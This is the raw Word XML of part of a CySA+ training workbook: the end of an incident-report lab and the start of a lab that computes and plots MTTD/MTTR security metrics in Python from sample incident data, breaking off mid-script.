              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6 RCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Root cause analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7 Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8 Lessons learned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Lessons learned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9 Metrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Metrics and KPIs (MTTD/MTTR/Alert volume)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>10 Communications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Communications (Legal, PR, Customer, Media, Regulatory, LE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>11 Declaration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Incident declaration and escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>12 Stakeholders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stakeholder identification and communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Author a complete executive incident report that satisfies every CySA+ 4.2 bullet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cleanly link evidence to chain-of-custody (Lab 21).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Capture lessons learned and KPIs that feed the next preparation cycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Render and seal a report with pandoc + SHA-256.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to author a complete executive incident report that satisfies every CySA+ 4.2 bullet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 28 — Security Metrics Dashboard (MTTD / MTTR)</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compute and plot the three KPIs CySA+ 4.2 explicitly calls out — Mean Time To Detect (MTTD), Mean Time To Respond (MTTR), and Mean Time To Remediate (MTTR-rem) — plus alert volume.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will compute and plot the three KPIs CySA+ 4.2 explicitly calls out — Mean Time To Detect (MTTD), Mean Time To Respond (MTTR), and Mean Time To Remediate (MTTR-rem) — plus alert volume. The output is a one-page PNG dashboard for the monthly CISO review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install Python + matplotlib</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y python3-pip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pip3 install matplotlib --break-system-packages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Seed last quarter's incident data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkdir -p /tmp/lab28 &amp;&amp; cd /tmp/lab28</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; incidents.csv &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id,opened,first_alert,response_start,remediated,sev,alert_count</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>INC-101,2026-02-01T09:00,2026-02-01T08:55,2026-02-01T09:12,2026-02-01T13:00,2,18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>INC-102,2026-02-08T11:00,2026-02-08T10:45,2026-02-08T11:08,2026-02-09T03:00,1,84</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>INC-103,2026-02-15T14:00,2026-02-15T13:30,2026-02-15T14:25,2026-02-15T16:00,3,7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>INC-104,2026-03-02T08:00,2026-03-02T07:50,2026-03-02T08:09,2026-03-02T12:30,2,22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>INC-105,2026-03-12T22:00,2026-03-12T21:55,2026-03-12T22:14,2026-03-13T02:00,2,11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>INC-106,2026-04-01T16:00,2026-04-01T15:40,2026-04-01T16:05,2026-04-01T19:00,3,5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>INC-107,2026-04-18T03:00,2026-04-18T02:50,2026-04-18T03:08,2026-04-18T05:30,2,14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>INC-108,2026-05-13T08:15,2026-05-13T08:00,2026-05-13T08:30,2026-05-13T11:00,1,412</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Columns map to CySA+ 4.2 KPIs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MTTD = first_alert → opened (analyst sees the alert)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MTTR (respond) = opened → response_start</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MTTR (remediate) = opened → remediated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Alert volume = alert_count</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Compute the KPIs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; kpis.py &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import csv, datetime as dt, statistics</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rows=[]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>with open("incidents.csv") as f:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    for r in csv.DictReader(f):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        for k in ("opened","first_alert","response_start","remediated"):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            r[k]=dt.datetime.fromisoformat(r[k])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        r["mttd_min"]=(r["opened"]-r["first_alert"]).total_seconds()/60</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        r["mttr_resp_min"]=(r["response_start"]-r["opened"]).total_seconds()/60</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        r["mttr_rem_min"]=(r["remediated"]-r["opened"]).total_seconds()/60</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        rows.append(r)</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print(f"Incidents: {len(rows)}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>print(f"MTTD          mean={statistics.mean(r['mttd_min'] for r in rows):.1f} min")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>print(f"MTTR respond  mean={statistics.mean(r['mttr_resp_min'] for r in rows):.1f} min")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>print(f"MTTR remed.   mean={statistics.mean(r['mttr_rem_min'] for r in rows):.1f} min")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>print(f"Alert volume  total={sum(int(r['alert_count']) for r in rows)}")</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python3 kpis.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The CISO target is typically MTTD &lt; 30 min and MTTR-respond &lt; 60 min. You now know whether you hit it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Plot the dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; dashboard.py &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import csv, datetime as dt, matplotlib</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>matplotlib.use("Agg")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import matplotlib.pyplot as plt</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rows=[]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>with open("incidents.csv") as f:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
